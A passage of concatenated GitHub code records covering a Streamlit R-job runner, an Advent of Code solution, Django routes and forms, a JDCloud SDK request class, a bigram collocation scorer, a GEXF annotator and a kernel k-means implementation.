NULL\n\n{method}Remote(X,{missing},\"{client_port}\",\"{server_ip}\",\"{server_port}\")\n\n    \"\"\".format(method = st.session_state['server_data']['core_function'],\n               missing = st.session_state['server_data']['missing_variables'],\n               client_port = st.session_state['server_data']['client_port'],\n               server_ip = st.session_state['server_data']['server_ip'],\n               server_port = st.session_state['server_data']['server_port']\n               )\n\n\n    with open('./code/'+R_runtime_file,\"w\") as f:\n        f.write(R_func_str)\n\n#    st.write(R_func_str)\n\n#    if debug_option:\n#        run_command_debug(['Rscript','--vanilla', R_runtime_file, '../'+ data_file])\n#    else:\n\n    log_file = './code/{}.txt'.format(R_runtime_file)\n    st.session_state['log_file'] = log_file\n\n    run_command(['Rscript','--vanilla', R_runtime_file, '../'+ data_file]) \n\nif refresh_button:\n    if st.session_state['pid'] :\n        stdout=None\n        stderr=None\n\n        try:\n            stdout, stderr = p.communicate(timeout = 1 )\n        except:\n            proc = psutil.Process(st.session_state['pid'].pid)\n#            st.write( proc.status())\n            if proc.status() == psutil.STATUS_ZOMBIE:\n                if st.session_state['log']:\n                    st.session_state['log'].flush()\n                log_text=''\n                
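# re-read the captured log so the aborted job's output can be shown\n                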
with open(st.session_state['log_file'], 'r') as f:\n                    log_text = f.read()\n                display_text = ' Job with PID {} was aborted unexpectedly \\n Click stop to clear it. \\n {} '.format(st.session_state['pid'].pid,log_text)\n            else: \n                display_text = ' Job with PID {} is running in the background \\n'.format(st.session_state['pid'].pid)\n                if stdout :\n                    display_text += stdout.decode('utf-8') + '\\n'\n                if stderr :\n                    display_text += stderr.decode('utf-8') + '\\n'\n            status_text = status_placeholder.text_area('Running Status', value=display_text ,key='Status', disabled = True )\n        else:\n            display_text = 'Job Finished \\n'\n            if stdout :\n                display_text += stdout.decode('utf-8') + '\\n'\n            if stderr :\n                display_text += stderr.decode('utf-8') + '\\n'\n            status_text = status_placeholder.text_area('Running Status', value=display_text ,key='Status', disabled = True )\n\ndef findandKillProcessIdByName(processName):\n    listOfProcessObjects = []\n    # Iterate over all the running processes\n    for proc in psutil.process_iter():\n        try:\n            pinfo = proc.as_dict(attrs=['pid', 'name', 'create_time'])\n            # print(pinfo)\n            # Check if process name contains the given name string.\n            if processName == pinfo['name'] :\n                listOfProcessObjects.append(pinfo['pid'])\n        except (psutil.NoSuchProcess, psutil.AccessDenied , psutil.ZombieProcess) :\n            pass\n    for x in listOfProcessObjects:\n        p_R = psutil.Process(x)\n        p_R.kill()\n    return listOfProcessObjects\n    \nif clear_all_R:\n    findandKillProcessIdByName('R')\n    \nif stop_button :\n    if st.session_state['pid'] :\n        status_text = status_placeholder.text_area('Running Status', value=\"Stopped process with pid: {}\".format(st.session_state['pid'].pid) ,key='Status', disabled = True )\n#        st.write(\"Stopped process with pid:\", st.session_state['pid'].pid )\n        st.session_state['pid'].kill()\n        st.session_state['pid'] = None\n\n\nst.write('Software Version : V_20220801')\n","repo_name":"Luyaochen1/midn_gui","sub_path":"remote/MIDN_Remote/streamlit/midn_remote_st.py","file_name":"midn_remote_st.py","file_ext":"py","file_size_in_byte":11095,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"}
+{"seq_id":"386064343","text":"import os\nfrom itertools import product\nfrom collections import deque\n\n'''https://raw.githubusercontent.com/mebeim/aoc/master/2022/solutions/day18.py'''\n\n\ndef readInput(filename: str):\n\n    script_location = os.path.dirname(os.path.realpath(__file__))\n    input_file_path = os.path.join(script_location, filename)\n\n    cubes = {}\n    with open(input_file_path, 'r') as f:\n        for line in f:\n            coords = tuple(map(int, line.split(',')))\n            cubes[coords] = 6\n    return cubes\n\n\ndef neighbor(x, y, z):\n    yield (x + 1, y, z)\n    yield (x - 1, y, z)\n    yield (x, y + 1, z)\n    yield (x, y - 1, z)\n    yield (x, y, z + 1)\n    yield (x, y, z - 1)\n\n\ndef escape(cubes, node, rangex, rangey, rangez):\n    queue = deque([node])\n    visited = set()\n    cnt = 0\n\n    while queue:\n        p = queue.popleft()\n        if p in visited:\n            continue\n\n        x, y, z = p\n        if x not in rangex or y not in rangey or z not in rangez:\n            return (visited, 0)\n\n        visited.add(p)\n\n        for n in neighbor(x, y, z):\n            if n in cubes:\n                cnt += 1\n            elif n not in visited:\n                queue.append(n)\n\n    return (visited, cnt)\n\n\ndef total_surface_area(cubes):\n    for c in cubes:\n        for n in neighbor(*c):\n            if n in cubes:\n                cubes[c] -= 1\n    faces = sum(cubes.values())\n    return faces\n\n\ndef bbox(cubes):\n    minx = miny = minz = float('inf')\n    maxx = maxy = maxz = float('-inf')\n    for x, y, z in cubes:\n        minx, maxx = min(x, minx), max(x, maxx)\n        miny, 
maxy = min(y, miny), max(y, maxy)\n minz, maxz = min(z, minz), max(z, maxz)\n rangex = range(minx, maxx + 1)\n rangey = range(miny, maxy + 1)\n rangez = range(minz, maxz + 1)\n\n return (rangex, rangey, rangez)\n\n\ndef part1(inputFile: str):\n cubes = readInput(inputFile)\n faces = total_surface_area(cubes)\n return faces\n\n\ndef part2(inputFile: str):\n cubes = readInput(inputFile)\n faces = total_surface_area(cubes)\n rangex, rangey, rangez = bbox(cubes)\n all_visited = set()\n for n in product(rangex, rangey, rangez):\n if n not in all_visited and n not in cubes:\n visited, cnt = escape(cubes, n, rangex, rangey, rangez)\n all_visited |= visited\n faces -= cnt\n return faces\n\n\ndef test():\n print('---- TEST ----')\n filename = 'test_input.txt'\n assert part1(filename) == 64\n\n print('Part 1 OK')\n assert part2(filename) == 58\n print('Part 2 OK\\n')\n\n\ndef main():\n print('\\n---- MAIN ----')\n filename = 'input.txt'\n\n solution_part1 = part1(filename)\n print(f'Solution for Part 1: {solution_part1}')\n assert solution_part1 == 4580\n\n solution_part2 = part2(filename)\n print(f'Solution for Part 2: {solution_part2}\\n')\n assert solution_part2 == 2610\n\n\nif __name__ == '__main__':\n test()\n main()\n","repo_name":"siimveske/AOC","sub_path":"2022/day18/day_18_boiling_boulders.py","file_name":"day_18_boiling_boulders.py","file_ext":"py","file_size_in_byte":2876,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"6137725502","text":"\"\"\"educacao_3_0 URL Configuration\n\nThe `urlpatterns` list routes URLs to views. For more information please see:\n https://docs.djangoproject.com/en/2.2/topics/http/urls/\nExamples:\nFunction views\n 1. Add an import: from my_app import views\n 2. Add a URL to urlpatterns: path('', views.home, name='home')\nClass-based views\n 1. Add an import: from other_app.views import Home\n 2. Add a URL to urlpatterns: path('', Home.as_view(), name='home')\nIncluding another URLconf\n 1. Import the include() function: from django.urls import include, path\n 2. 
Add a URL to urlpatterns: path('blog/', include('blog.urls'))\n\"\"\"\nfrom django.contrib import admin\nfrom django.urls import path\nfrom site_est.views import index, elements, generic, aula, web, edu, labs, lab01, lab02, lab03, lab04, lab05, lab06, lab07, lab08, book_list, upload\n\n\nfrom django.conf import settings\nfrom django.conf.urls.static import static\n\nurlpatterns = [\n path('admin/', admin.site.urls),\n path('', index),\n path('elements/', elements),\n path('generic/', generic),\n path('aula/', aula),\n path('web/', web),\n path('edu/', edu),\n path('labs/', labs),\n path('lab01/', lab01),\n path('lab02/', lab02),\n path('lab03/', lab03),\n path('lab04/', lab04),\n path('lab05/', lab05),\n path('lab06/', lab06),\n path('lab07/', lab07),\n path('lab08/', lab08),\n path('book_list/', book_list),\n path('book_list/upload/', upload)\n]\n\nif settings.DEBUG:\n urlpatterns += static(settings.MEDIA_URL, document_root=settings.MEDIA_ROOT)\n","repo_name":"Benedito-Medeiros-Neto-UnB/TacProgWeb","sub_path":"EDU 3.0 TUTORIAIS 1 2020/Edu 3.0_TAC-master/educacao_3_0/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1552,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"40"} +{"seq_id":"35025947543","text":"class FormMixin:\n def get_error(self):\n if hasattr(self, 'errors'): #hasattr() 函数用于判断对象是否包含对应的属性。\n #json格式的数据\n errors_json = self.errors.get_json_data().values()\n # print(error_json) #<QuerySet [{'id': 1, 'name': '首页'}, {'id': 2, 'name': 'python入门'}, {'id': 3, 'name': 'python web'}]>\n err_msg_list = []\n for item in errors_json:\n err_msg_list.append(item[0].get('message'))\n\n err_msg_str = '/'.join(err_msg_list) # 拼接错误信息为一个字符串\n return err_msg_str\n return None\n\n","repo_name":"juehuan182/QmpythonBlog","sub_path":"util/forms.py","file_name":"forms.py","file_ext":"py","file_size_in_byte":652,"program_lang":"python","lang":"zh","doc_type":"code","stars":2,"dataset":"github-code","pt":"40"} +{"seq_id":"9891219776","text":"import numpy as np\n\nfrom Automated_Design.gen_schlegel import create_2d_mapping\n\n\ndef coords_are_almost_equal(a, b, threshold=0.001):\n a_x, a_y = a\n b_x, b_y = b\n x_almost_equal = abs(a_x - b_x) < threshold\n y_almost_equal = abs(a_y - b_y) < threshold\n return x_almost_equal and y_almost_equal\n\n\ndef test_create_2d_mapping_using_tetrahedron():\n edges = np.array([[2, 0],\n [1, 0],\n [3, 1],\n [3, 0],\n [2, 1],\n [3, 2]])\n coordinates = np.array([[0., 0., 0.612372],\n [-0.288675, -0.5, -0.204124],\n [-0.288675, 0.5, -0.204124],\n [0.57735, 0., -0.204124]])\n faces = [[0, 2, 1], [0, 1, 3], [0, 3, 2], [1, 2, 3]]\n xycoords = create_2d_mapping(edges, coordinates, faces)\n\n # Ideally, these assertions would assure that three of the four nodes\n # are arranged in an equilateral triangle scaled to sit on top of the\n # unit circle with the fourth node exactly in the middle of the other\n # three. 
But, since I'm not clever enough to know how to write those\n    # assertions exactly, I'm starting with asserting it results in both a\n    # possible solution and the solution I know it will reach given how\n    # the function currently works.\n\n    m = 3.**(1./2.)/2\n\n    # The fourth node happened to be picked as center:\n    assert coords_are_almost_equal([0, 0], xycoords[3])\n    # The first three nodes all surround the fourth node.\n    # The first node happened to be picked to be directly above center:\n    assert coords_are_almost_equal([1, 0], xycoords[0])\n    # The second is bottom left:\n    assert coords_are_almost_equal([-.5, -m], xycoords[1])\n    # The third is bottom right:\n    assert coords_are_almost_equal([-.5, m], xycoords[2])\n","repo_name":"kritikaasri/DAEDALUS-clone","sub_path":"tests/test_gen_schlegel.py","file_name":"test_gen_schlegel.py","file_ext":"py","file_size_in_byte":1859,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"40"}
+{"seq_id":"73627969079","text":"from jdcloud_sdk.core.jdcloudrequest import JDCloudRequest\n\n\nclass DescribeAttackSourceRequest(JDCloudRequest):\n    \"\"\"\n    Query the attack source\n    \"\"\"\n\n    def __init__(self, parameters, header=None, version=\"v1\"):\n        super(DescribeAttackSourceRequest, self).__init__(\n            '/attacklog/{attackLogId}:describeAttackSource', 'GET', header, version)\n        self.parameters = parameters\n\n\nclass DescribeAttackSourceParameters(object):\n\n    def __init__(self, attackLogId, ip):\n        \"\"\"\n        :param attackLogId: attack log record Id\n        :param ip: public IP already protected by the Anti-DDoS protection package. <br>- Use the <a href='http://docs.jdcloud.com/anti-ddos-protection-package/api/describeprotectediplist'>describeProtectedIpList</a> API to query the public IPs protected by the Anti-DDoS protection package\n        \"\"\"\n\n        self.attackLogId = attackLogId\n        self.ip = ip\n\n","repo_name":"jdcloud-api/jdcloud-sdk-python","sub_path":"jdcloud_sdk/services/antipro/apis/DescribeAttackSourceRequest.py","file_name":"DescribeAttackSourceRequest.py","file_ext":"py","file_size_in_byte":853,"program_lang":"python","lang":"en","doc_type":"code","stars":16,"dataset":"github-code","pt":"40"}
+{"seq_id":"11372040479","text":"terminal = \"-m message gifs -g -q -t 10\"\nprint(terminal)\nter = terminal.split()\nprint(ter)\n\n\"\"\"\n    -m + сообщение\n    -g будут гифки\n    -t + время до отправки\n    -q количество\n\"\"\"\nstroka = \"\"\nti = 0\nqu = 1\ng = False\n\nfor i in ter:\n    if i == \"-m\":\n        m = True\n        t = False\n        q = False\n        continue\n    elif i == \"-g\":\n        g = True\n        continue\n    elif i == \"-t\":\n        t = True\n        m = False\n        q = False\n        continue\n    elif i == \"-q\":\n        q = True\n        t = False\n        m = False\n        continue\n\n    if m:\n        stroka += i + \" \"\n    elif t:\n        ti += int(i)\n    elif q:\n        qu += int(i)\n\nprint(stroka)\nprint(g)\nprint(ti)\nprint(qu)\n\n# for i in range(0, int(text)):\n#     test = ''.join(choice(ascii_uppercase) for i in range(10)) # рандомная гифка из файла\n#     await ctx.send(embed=discord.Embed(description=test + \" \" + text)) # выделленный техт\n#     lines = open('gifer').read().splitlines()\n#     myline = random.choice(lines)\n#     print(myline)\n#     await ctx.send(embed=discord.Embed().set_image(url=myline)) # Скинуть gif по url\n#     await ctx.send(file=discord.File('giphy.gif')) # Локально скинуть gif\n","repo_name":"SugawaraKou/Discord_Self_spam_bot","sub_path":"file.py","file_name":"file.py","file_ext":"py","file_size_in_byte":1295,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"}
+{"seq_id":"111304987","text":"from __future__ import division\n# CIS 511 NLP - Assignment 1 - Collocation 
Identification\n\n\"\"\"\nCreated on Sat Feb 2 20:30:18 2019\n\n@author: Siyu Yang\n@unique name: siyuya\n@UMID:76998080\n\"\"\"\n\nimport string\nimport math\nimport sys\n\n#=== Functions ===#\n\n# 1) Load Files and create unigram dictionary\ndef create_unigram(filename):\n    unigram_dict = {}\n    unigram_num = 0\n    with open(filename,'r') as f:\n        for line in f:\n            splitLine = line.split()\n            for word in splitLine: \n                # store unigram (no tokens of only punctuation)\n                if word not in string.punctuation:\n                    #count the number of unigrams\n                    unigram_num += 1\n                    if word in unigram_dict:\n                        unigram_dict[word] += 1\n                    else:\n                        unigram_dict[word] = 1\n    return unigram_dict,unigram_num\n    \n# 2) Load Files and create bigram dictionary \ndef create_bigram(filename):\n    bigram_dict = {}\n    bigram_num = 0\n    pre_word = \".\"\n    with open(filename,'r') as f:\n        for line in f:\n            splitLine = line.split()\n            for word in splitLine:\n                if word not in string.punctuation:\n                    # store bigram (no tokens of only punctuation)\n                    if pre_word not in string.punctuation:\n                        #count the number of bigrams\n                        bigram_num += 1\n                        bigram = pre_word + ' ' + word\n                        if bigram in bigram_dict:\n                            bigram_dict[bigram] += 1\n                        else:\n                            bigram_dict[bigram] = 1\n                \n                    # set next pre_word\n                    pre_word = word\n    \n    # discard bigrams that occur less than 5 times\n    bigram_dict = { bigram:count for bigram, count in bigram_dict.items() if count >=5 }\n    return bigram_dict, bigram_num\n\n\n\n# 3) Create Bigram Matrices\ndef create_matrices(bigram_dict,N):\n    '''\n    @param:\n        bigram_dict: the dictionary of bigram\n        N: the total number of the bigrams\n    \n    @return:\n        matrices: the dictionary of the matrix for every bigram\n        word1_dict: the dictionary of the first word\n        word2_dict: the dictionary of the second word\n    '''\n    # create dictionaries and save word1 and word2 counts in dictionaries\n    word1_dict = {}\n    word2_dict = {}\n\n    # loop through every bigram in the dictionary\n    for bigram,value in bigram_dict.items():\n        word1 = bigram.split()[0]\n        word2 = bigram.split()[1] \n        # store word1\n        if word1 in word1_dict:\n            word1_dict[word1] += 1\n        else:\n            word1_dict[word1] = 1 \n        # store word2\n        if word2 in word2_dict:\n            word2_dict[word2] += 1\n        else:\n            word2_dict[word2] = 1\n\n\n    # create dictionary and store matrix for each bigram\n    matrices = {}\n\n    for bigram,value in bigram_dict.items(): \n        # extract each word1 & word2\n        word1 = bigram.split()[0]\n        word2 = bigram.split()[1]\n        # 1st value: both word1 and word2 (bigram)\n        a = bigram_dict[bigram] \n        # 2nd value: only word2 occurrences\n        b = word2_dict[word2] - a \n        # 3rd value: only word1 occurrences\n        c = word1_dict[word1] -a \n        # 4th value: neither word1 nor word2\n        d = N-a-b-c \n        \n        #store values as matrix \n        matrix=[a,c,b,d]\n        matrices[bigram] = matrix\n        \n    return matrices, word1_dict, word2_dict\n\n\n# 4) Calculate Chi-Square Score\ndef calculate_chi_square(matrices,N):\n    '''\n    @param:\n        matrices: the dictionary of the matrix for every bigram\n        N: the total number of the bigrams\n    \n    @return:\n        chi_square_list: the dictionary of the chi-square scores\n    '''\n    chi_square_list = {}\n\n    for bigram, matrix in matrices.items(): \n        a = matrix[0]\n        b = matrix[1]\n        c = matrix[2]\n        d = matrix[3]\n        #calculate the chi-square score \n        chi_square = (N * pow((a*d-b*c),2))/((a+b)*(a+c)*(b+d)*(c+d))\n        # store score in dictionary with bigram as key\n        chi_square_list[bigram] = chi_square\n\n    return chi_square_list\n\n\n# 5) Calculate PMI Score\ndef calculate_PMI(matrices, N, N1, bigram_dict, word1_dict, word2_dict):\n    '''\n    @param:\n        matrices: the 
dictionary of the matrix for every bigram\n        bigram_dict: the dictionary of bigram\n        N: the total number of the bigrams\n        N1: the total number of the unigrams\n        word1_dict: the dictionary of the first word\n        word2_dict: the dictionary of the second word\n    \n    @return:\n        PMI_list: the dictionary of the PMI scores\n    '''\n    PMI_list = {}\n\n    for bigram,matrix in matrices.items():\n        word1 = bigram.split()[0]\n        word2 = bigram.split()[1]\n        \n        # calculate PMI score\n        p = bigram_dict[bigram]/N\n        p1 = word1_dict[word1]/N1\n        p2 = word2_dict[word2]/N1\n        PMI = math.log(p/(p1*p2))\n        # store score in dictionary with bigram as key\n        PMI_list[bigram] = PMI\n    \n    return PMI_list\n    \n\nif __name__ == \"__main__\":\n\n    # 1) Load files, create dictionaries for bigrams and unigrams\n    bigram_dict, N = create_bigram(sys.argv[1])\n    unigram_dict, N1 = create_unigram(sys.argv[1])\n    \n    # 2) Load measure type\n    measure = sys.argv[2]\n\n    # 3) create bigram matrices and dictionaries for word1 and word2\n    matrices, word1_dict, word2_dict = create_matrices(bigram_dict,N)\n    \n    # 4) calculate requested measurement score\n    if measure == \"chi-square\":\n        score = calculate_chi_square(matrices,N)\n    elif measure == \"PMI\":\n        score = calculate_PMI(matrices, N, N1, bigram_dict, word1_dict, word2_dict)\n\n    # 5) output top 20 ranked bigrams and scores\n    top20 = sorted(score.items(), key=lambda item:item[1], reverse = True)[:20]\n    for key,value in top20:\n        print(key,value)\n\n","repo_name":"Siyu-Yang/CIS-511-NLP","sub_path":"p1/Collocations.py","file_name":"Collocations.py","file_ext":"py","file_size_in_byte":6019,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"}
+{"seq_id":"28516171685","text":"#!/usr/bin/env python\n'''\nUsage: annotate_gexf.py -i <gexf> [-n <node_annot>] [-c <color_attr>] [-e <edge_annot>] [-w <weight_attr>] [--force-str]\n\nOptions:\n    -i <gexf>       input, read from stdin if omitted\n    -n <node_annot> node annotation\n    -c <color_attr> color attribute\n    -e <edge_annot> edge annotation\n    -w <weight_attr> weight attribute\n    --force-str     force attributes to have string type\n'''\n\nfrom __future__ import print_function\nimport sys\nimport signal\nimport logging\nsignal.signal(signal.SIGPIPE, signal.SIG_DFL)\nlogging.basicConfig(\n    level=logging.DEBUG,\n    format='%(asctime)s; %(levelname)s; %(funcName)s; %(message)s',\n    datefmt='%y-%m-%d %H:%M:%S')\nimport xml.etree.ElementTree as etree\nimport numpy as np\nimport pandas as pd\n\nxmlns = {'default':'http://www.gexf.net/1.3', 'viz':'http://www.gexf.net/1.3/viz', 'xsi':'http://www.w3.org/2001/XMLSchema-instance'}\nattrs_tag = '{{{}}}attributes'.format(xmlns['default'])\nattr_tag = '{{{}}}attribute'.format(xmlns['default'])\nattvs_tag = '{{{}}}attvalues'.format(xmlns['default'])\nattv_tag = '{{{}}}attvalue'.format(xmlns['default'])\ncolor_tag = '{{{}}}color'.format(xmlns['viz'])\n\ndef read_node_annotation(filename, forcestr=False):\n    if filename is None:\n        return {},{}\n    if forcestr:\n        dat = pd.read_table(filename, dtype=str)\n    else:\n        dat = pd.read_table(filename)\n    ctypes = get_column_type(dat)\n    return dat.set_index('node').to_dict(),ctypes\n\ndef read_edge_annotation(filename, forcestr=False):\n    if filename is None:\n        return {},{}\n    if forcestr:\n        dat = pd.read_table(filename, dtype=str)\n    else:\n        dat = pd.read_table(filename)\n    ctypes = get_column_type(dat)\n    x = dat.set_index(['source','target']).to_dict()\n    y = dat.set_index(['target','source']).to_dict()\n    for name in x:\n        x[name].update(y[name])\n    return 
x,ctypes\n\ndef get_column_type(dat):\n    col_types = dict()\n    for name in dat.columns:\n        ctype = dat[name].dtype\n        if np.issubdtype(ctype, np.integer):\n            col_types[name] = 'integer'\n        elif np.issubdtype(ctype, np.floating):\n            col_types[name] = 'float'\n        else:\n            col_types[name] = 'string'\n    return col_types\n\ndef main(args):\n    logging.info(args)\n    node_annot,node_ctypes = read_node_annotation(args['n'], forcestr=args['force-str'])\n    logging.info(node_ctypes)\n    edge_annot,edge_ctypes = read_edge_annotation(args['e'], forcestr=args['force-str'])\n    logging.info(edge_ctypes)\n\n    for prefix,uri in xmlns.items():\n        if prefix == 'default':\n            prefix = ''\n        etree.register_namespace(prefix, uri)\n\n    tree = etree.parse(args['i'])\n    root = tree.getroot()\n    graph = root.find('default:graph', xmlns)\n    nodes = graph.find('default:nodes', xmlns)\n    edges = graph.find('default:edges', xmlns)\n    graph.remove(nodes)\n    graph.remove(edges)\n    attributes = graph.findall('default:attributes', xmlns)\n    attr_classes = [x.attrib['class'] for x in attributes]\n    if not 'node' in attr_classes:\n        node_attributes = etree.SubElement(graph, attrs_tag, {'class':'node','mode':'static'})\n    else:\n        node_attributes = attributes[attr_classes.index('node')]\n    if not 'edge' in attr_classes:\n        edge_attributes = etree.SubElement(graph, attrs_tag, {'class':'edge','mode':'static'})\n    else:\n        edge_attributes = attributes[attr_classes.index('edge')]\n    graph.append(nodes)\n    graph.append(edges)\n\n    node_dict = {node.attrib['id']:node.attrib['label'] for node in nodes.iterfind('default:node', xmlns)}\n\n    for name in node_annot:\n        attr = etree.SubElement(node_attributes, attr_tag,\n                {'id':name, 'title':name, 'type':node_ctypes[name]})\n        logging.info(name)\n        for node in nodes.iterfind('default:node', xmlns):\n            label = node.attrib['label']\n            if label in node_annot[name]:\n                value = str(node_annot[name][label])\n            else:\n                continue\n            if args['c'] is not None and name == args['c']:\n                r,g,b,a = value.split(',')\n                viz_color = node.find('viz:color', xmlns)\n                if viz_color is not None:\n                    node.remove(viz_color)\n                viz_color = etree.SubElement(node, color_tag, {'r':r,'g':g,'b':b,'a':a})\n            else:\n                attvalues = node.find('default:attvalues', xmlns)\n                if attvalues is None:\n                    attvalues = etree.SubElement(node, attvs_tag)\n                attv = etree.SubElement(attvalues, attv_tag,\n                        {'for':name, 'value':value})\n\n    for name in edge_annot:\n        attr = etree.SubElement(edge_attributes, attr_tag,\n                {'id':name, 'title':name, 'type':edge_ctypes[name]})\n        logging.info(name)\n        for edge in edges.iterfind('default:edge', xmlns):\n            src = edge.attrib['source']\n            tgt = edge.attrib['target']\n            key = (str(node_dict[src]),str(node_dict[tgt]))\n            if key in edge_annot[name]:\n                value = str(edge_annot[name][key])\n            else:\n                continue\n            if args['w'] is not None and name == args['w']:\n                edge.set('weight', value)\n            else:\n                attvalues = edge.find('default:attvalues', xmlns)\n                if attvalues is None:\n                    attvalues = etree.SubElement(edge, attvs_tag)\n                attv = etree.SubElement(attvalues, attv_tag,\n                        {'for':name, 'value':value})\n\n    tree.write('/dev/stdout', xml_declaration=True)\n\n\nif __name__ == '__main__':\n    from docopt import docopt\n    args = docopt(__doc__)\n    args = {k.lstrip('-<').rstrip('>'):args[k] for k in args}\n    try:\n        main(args)\n    except KeyboardInterrupt:\n        logging.warning('Interrupted')\n        
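# exit with a non-zero status so callers can detect the interruption\n        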
sys.exit(1)\n","repo_name":"nh3/graph-utils","sub_path":"annotateGexf.py","file_name":"annotateGexf.py","file_ext":"py","file_size_in_byte":5927,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"33127622699","text":"import numpy as np\nimport numba as nb\nfrom sklearn.utils import check_random_state\n\n\n################################################################################\n# Utils\n\n@nb.jit(nopython=True, nogil=True, parallel=True)\ndef square_euclidean_distance(samples_1, samples_2):\n \"\"\"\n Computes the squared Euclidean distance between two sets of samples.\n \"\"\"\n distance_matrix = np.zeros((samples_1.shape[0], samples_2.shape[0]))\n for j in nb.prange(samples_1.shape[0]):\n for i in range(j + 1, samples_2.shape[0]):\n for v in range(samples_1.shape[1]):\n distance_matrix[j, i] += (samples_1[j, v] - samples_2[i, v])**2\n if j < samples_2.shape[0] and i < samples_1.shape[0]:\n distance_matrix[i, j] = distance_matrix[j, i]\n\n return distance_matrix\n\n\n################################################################################\n# Kernels\n\nclass GaussianKernel:\n \"\"\"\n Computes the Gaussian kernel of the matrix of pairwise Euclidean distance\n between the samples.\n\n Parameters\n ----------\n gamma : float, optional\n Coefficient of the Gaussian kernel.\n \"\"\"\n def __init__(self, gamma=None):\n \n self.gamma = gamma\n \n def __call__(self, samples):\n\n kernel_matrix = square_euclidean_distance(samples, samples)\n\n gamma = self.gamma\n if gamma is None:\n sigma = 0.2*np.max(kernel_matrix)\n gamma = 1/(2.*sigma**2)\n\n return np.exp(-gamma*kernel_matrix)\n\n\n################################################################################\n# Kernel k-means\n\nclass KernelKMeans:\n \"\"\"\n Kernel k-means clustering.\n \n Parameters\n ----------\n n_clusters : int, optional\n Number of clusters to form.\n init : {'random', 'k-means++'}, optional\n Method to initialize the labels, either 'random' or 'k-means++'.\n k-means++ is a method to improve convergence. It is not the default\n option to stay closer to the original ANODI implementation.\n n_init : int, optional\n Number of times the clustering is applied with different seeds, the\n final result being the one with the lowest inertia.\n max_iter : int, optional\n Maximum number of iterations of the k-means algorithm.\n kernel : kernel object or function, ndarray, or None, optional\n Kernel to compute the kernel matrix from the data. If a kernel object,\n it must have a __call__ function with a single argument (the data) that\n returns a ndarray (the kernel matrix). A kernel function must fit the\n same input and output. An ndarray must be a kernel matrix. None means\n that a normal k-means is used.\n verbose : bool, optional\n If True, print information about the successive steps, if False, nothing\n is printed.\n random_state : int or RandomState instance, optional\n If int, random_state is the seed used by the random number generator;\n If RandomState instance, random_state is the random number generator;\n If None, the random number generator is the RandomState instance used by\n 'np.random'.\n \n Attributes\n ----------\n labels_ : array, shape (n_samples)\n Store the label of the cluster associated to each sample.\n \n References\n ----------\n Based on the following MATLAB implementation:\n https://github.com/xtan1/comparingGSalgorithms/blob/f02c20f3f163e87b35ecdb90d3f42e4a7e7fa10b/dualkmeansFast.m\n Shawe-Taylor, J. & Cristianini, N. 
(2011).\n Kernel Methods for Pattern Analysis.\n Cambridge University Press, https://doi.org/10.1017/CBO9780511809682\n Arthur, D. & Vassilvitskii, S. (2007).\n k-means++: the advantages of careful seeding.\n Proceedings of the eighteenth annual ACM-SIAM symposium on Discrete algorithms, 1027–1035\n \"\"\"\n def __init__(self,\n n_clusters=2,\n init='random',\n n_init=10,\n max_iter=300,\n kernel=GaussianKernel(),\n verbose=False,\n random_state=None):\n self.n_clusters = n_clusters\n self.init = init\n self.n_init = n_init\n self.max_iter = max_iter\n self.kernel = kernel\n self.verbose = verbose\n self.random_state = random_state\n \n def _initialize(self, matrix, random_state):\n \"\"\"\n Initializes the labels at random or using the k-means++ method\n \"\"\"\n if random_state is None:\n random_state = check_random_state(self.random_state)\n else:\n random_state = check_random_state(random_state)\n \n n = matrix.shape[0]\n if self.init == 'k-means++':\n centroids = [random_state.randint(n)]\n while len(centroids) < self.n_clusters:\n centroid_distances = matrix[centroids]\n if self.kernel is None:\n centroid_distances = square_euclidean_distance(centroid_distances,\n matrix)\n distances = np.min(centroid_distances, axis=0)**2\n distances /= np.sum(distances)\n centroid = random_state.choice(n, p=distances)\n centroids.append(centroid)\n centroid_distances = matrix[centroids]\n if self.kernel is None:\n centroid_distances = square_euclidean_distance(centroid_distances,\n matrix)\n return np.argmin(centroid_distances, axis=0)\n else:\n return random_state.randint(self.n_clusters, size=n)\n \n def _fit_single(self, kernel_matrix, init_labels):\n \"\"\"\n Computes the kernel k-means clustering for a single initialization\n \"\"\"\n labels = init_labels\n n = kernel_matrix.shape[0]\n cluster_matrix = np.zeros((n, self.n_clusters))\n cluster_matrix[np.arange(n), labels] = 1\n\n change = True\n it = 0\n while change == True and it < self.max_iter:\n if self.verbose:\n print('Iteration ', it + 1, '/', self.max_iter, sep='')\n \n change = False\n\n nb_cluster_samples = np.sum(cluster_matrix, axis=0)\n nb_cluster_samples[nb_cluster_samples != 0.] 
= 1./nb_cluster_samples[nb_cluster_samples != 0.]\n E = cluster_matrix@np.diag(nb_cluster_samples)\n KE = kernel_matrix@E\n cluster_distances = -2*KE + np.diag(E.T@KE)\n new_labels = np.argmin(cluster_distances, axis=1)\n\n for i in range(n):\n if labels[i] != new_labels[i]:\n cluster_matrix[i, new_labels[i]] = 1\n cluster_matrix[i, labels[i]] = 0\n change = True\n\n labels = new_labels\n it += 1\n \n distances = cluster_distances[np.arange(cluster_distances.shape[0]),\n labels]\n inertia = np.sum(distances)\n\n return labels, inertia, it\n \n def fit(self, X):\n \"\"\"\n Computes the kernel k-means clustering\n \n Parameters\n ----------\n X : array, shape (n_samples, n_features)\n Training instances to cluster.\n \"\"\"\n random_state = check_random_state(self.random_state)\n \n self.labels_ = None\n self.inertia_ = None\n self.n_iter_ = None\n \n if self.kernel is not None:\n if isinstance(self.kernel, np.ndarray):\n kernel_matrix = self.kernel\n else:\n kernel_matrix = self.kernel(X)\n else:\n kernel_matrix = X@X.T\n \n seeds = random_state.randint(np.iinfo(np.int32).max, size=self.n_init)\n for seed in seeds:\n if self.kernel is not None:\n labels = self._initialize(kernel_matrix, seed)\n else:\n labels = self._initialize(X, seed)\n labels, inertia, it = self._fit_single(kernel_matrix, labels)\n \n if self.inertia_ is None or inertia < self.inertia_:\n self.labels_ = labels.copy()\n self.inertia_ = inertia\n self.n_iter_ = it\n \n return 